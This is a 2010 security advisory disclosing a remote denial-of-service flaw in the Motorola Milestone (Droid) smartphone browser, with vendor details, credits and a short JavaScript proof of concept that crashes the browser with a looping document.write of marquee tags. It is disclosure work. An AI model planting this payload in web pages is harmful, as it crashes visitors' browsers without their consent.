Security

  Text :  

[MajorSecurity Advisory #65]Motorola Milestone(Droid) Smartphone Remote
Denial of Service

Details
============
Product: Motorola Milestone(Droid) Smartphone
Security-Risk: low
Remote-Exploit: yes
Vendor-URL:
http://www.motorola.com/Consumers/US-EN/Consumer-Product-and-Services/Mobil
e-Phones/Motorola-DROID-US-EN?localeId=33
Vendor-Status: informed
Advisory-Status: published on 02-02-2010

Credits
============
Discovered by: David Vieira-Kurz
http://www.majorsecurity.info

Affected Products:
============
Motorola Milestone(Droid) smartphone Browser with following useragent:
Mozilla/5.0 (Linux; U; Android 2.0; de-de; Milestone
Build/SHOLS_U2_01.03.1) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0
Mobile Safari/530.17

Original Advisory:
============
http://www.majorsecurity.info/index_2.php?adv=major_rls65

Introduction
============
The Motorola Milestone(droid) is a smartphone produced by Motorola based on
the android operation system.

More Details
============
A remotely exploitable vulnerability has been found in the JavaScript
Engine of the MobileSafari Browser(based on Webkit Engine) used on the
Motorola Milestone(droid) smartphone.
In detail, the following flaw was determined:
The Motorola Milestone(Droid) is prone to a denial of service vulnerability
when parsing certain HTML content. This is possible due to a failure in
handling exceptional conditions. This issue is caused by a memory
corruption error when handling javascript elements, which could be
exploited by remote attackers to crash the browser by tricking a user into
visiting a specially crafted web page. This issue can NOT be lead to remote
code execution, so that the potential security risk is rated low.

The exploit has been tested on a Motorola Milestone(Droid) using following
useragent:

Mozilla/5.0 (Linux; U; Android 2.0; de-de; Milestone
Build/SHOLS_U2_01.03.1) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0
Mobile Safari/530.17

Proof of Concept:
============
<script>
var overloadtag = "<marquee>";
for(x=1;x<=9999999999999;x++){
document.write(overloadtag);
}
&lt;/script&gt;

MajorSecurity
================
MajorSecurity is a German penetrationtesting and security research company
which focuses on web application security. We offer professional
penetrationtestings, security audits, source code reviews and reliable
proof of concepts. You will find more Information about MajorSecurity at
http://www.majorsecurity.info/

Unaltered electronic reproduction of this advisory is permitted. For all
other reproduction or publication, in printing or otherwise, contact
office@majorsecurity.info for permission.
Use of the advisory constitutes acceptance for use in an "as is"
condition. All warranties are excluded.
In no event shall majorsecurity and David Vieira-Kurz IT Security Services
be liable for any damages whatsoever including direct, indirect,
incidental, consequential, loss of business profits or special damages,
even if majorsecurity has been advised of the possibility of such damages.

Copyright 2010 MajorSecurity and David Vieira-Kurz IT Security Services.
All rights reserved. Terms of use apply.

--
--
David Vieira-Kurz IT Security Services
Tel: 0151 24 132 139
http://www.penetrationstest.net | http://www.sichereprogrammierung.de